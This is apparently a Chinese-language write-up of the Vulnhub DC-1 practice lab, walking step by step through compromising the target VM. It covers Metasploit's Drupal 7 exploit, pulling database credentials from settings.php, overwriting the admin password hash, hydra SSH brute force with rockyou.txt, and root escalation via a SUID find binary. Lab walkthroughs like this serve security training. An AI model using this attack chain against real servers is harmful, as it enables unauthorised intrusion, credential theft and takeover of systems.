Vulnhub靶场-DC-1靶机练习

Vulnhub-DC-1

daoyuan ## 零、环境配置

​ 1、虚拟机：vmware 15.5.6

​ 2、攻击环境：kali linux 2020.3 192.168.143.128

​ 3、靶机：DC-1

​ 靶机直接从虚拟机wmware中打开，注意将网络适配器改为nat模式。

一、攻击过程

一、主机存活扫描

arp-scan -l
探测到目标ip:192.168.143.134

二、端口扫描

namp -A -p- 192.168.143.134
扫描到以下端口以及服务
22端口——ssh服务
80端口——http服务

三、漏洞探测

nmap --script=vuln 192.168.143.134
探测到Drupal 7 版本存在漏洞

四、漏洞攻击

msfconsole
打开msfconsole

search drupal 7
搜索drupal 7 漏洞，显示有最新的2018版，而且效果很棒。

use 4(定位到攻击载荷4)
set rhosts 192.168.143.134(设定靶机IP)
exploit(开始攻击)

shell             
#(得到shell)
python -c "import pty;pty.spawn('/bin/bash')"
#(Python 交互shell脚本,数据库只允许本地连接，我们需要一个shell)
ls -al
(查看所有文件可以看到有flag1)

cat flag1.txt
打开flag1.txt 得到提示CMS配置文件的提示，百度drupal配置文件信息

cat sites/default/settings.php
打开配置文件得到flag2
提示爆破与字典不是唯一的方法，同时给出了数据库的相关信息。

mysql -u dbuser -p #(登入数据库。输入密码)
show databases;#(显示所有数据库名)
use drupaldb#(定位drupaldb数据库)
show tables;#(显示当前数据库的所有表)

探测到有用的表——>users
select * from users;
查看users表内容，发现用户名admin，但密码是一段hash值，难以破解。这里直接替换掉它

cd ..
./scripts/password-hash.sh daoyuan
用script脚本生成daoyuan的hash密码

update users set pass="$S$DxFoVcv5JJYjcK/pu4PLBq74qKW/ZCQKFMYcsSPadKFI9ms9K.gR" where uid=1;
用新密码生成的hash值覆盖原有密码

登入网页发现flag3,提示passwd，联想passwd文件

cat etc/passwd
打开passwd文件发现有账户flag4,之前端口扫描发现22端口已经开启
这里用ssh远程登入，但不知道密码

尝试用hydra爆破一下
字典用自带的rockyou.txt
进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压：

gzip -d rockyou.txt.gz
复制txt到root目录下

hydra -l flag4 -P rockyou.txt 192.168.143.134 ssh
得到密码orange，可以ssh远程登入了

ssh flag4@192.168.143.134 -p 22
密码orange

得到flag4 ,提示root，我们这里是www用户，权限很低，root就是暗示提权

find / -type f -perm -u=s 2>/dev/null
查找靶机可执行的二进制文件,找到了find的suid权限.

	touch 1
	find 1 -exec "/bin/sh" \;
	cd /root
	cat thefinalflag.txt
	find提权，得到最后的flag

至此，5个flag已经全部找出！

如有错误，烦请不吝赐教。
转载请注明出处！